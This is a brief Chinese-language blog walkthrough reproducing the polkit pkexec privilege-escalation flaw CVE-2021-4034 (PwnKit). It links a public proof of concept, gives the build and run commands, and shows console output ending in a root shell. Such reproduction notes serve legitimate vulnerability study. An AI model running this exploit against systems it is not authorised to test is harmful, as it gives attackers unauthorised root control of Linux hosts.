CVE-2021-4034 polkit提权漏洞复现

CVE-2021-4034 polkit提权漏洞复现

1.前期准备

Github地址:

bash 复制代码
https://github.com/berdav/CVE-2021-4034

polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于sudo,允许用户以另一个用户身份执行命令

漏洞点逻辑:执行pkexec时,指定了恶意的envp[0],那么可以写入一个环境变量到目标进程空间中


2.复现

查看是否存在pkexec:

依次运行:

bash 复制代码
make
./cve-2021-4034
bash 复制代码
vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

提权成功!

相关推荐
(:满天星:)10 分钟前
第31篇:块设备与字符设备管理深度解析(基于OpenEuler 24.03)
linux·运维·服务器·网络·centos
爱莉希雅&&&17 分钟前
shell编程之awk命令详解
linux·服务器·git
笑稀了的野生俊20 分钟前
在服务器中下载 HuggingFace 模型:终极指南
linux·服务器·python·bash·gpu算力
渡我白衣44 分钟前
Linux操作系统之文件(四):文件系统(上)
linux
ZZH1120KQ1 小时前
Linux系统安全及应用
linux·运维·系统安全
加密狗复制模拟1 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
程序漫游人1 小时前
centos8.5安装jdk21详细安装教程
java·linux
小小小糖果人2 小时前
Linux云计算基础篇(5)
linux·运维·服务器
small_wh1te_coder2 小时前
硬件嵌入式学习路线大总结(一):C语言与linux。内功心法——从入门到精通,彻底打通你的任督二脉!
linux·c语言·汇编·嵌入式硬件·算法·c
galaxylove2 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化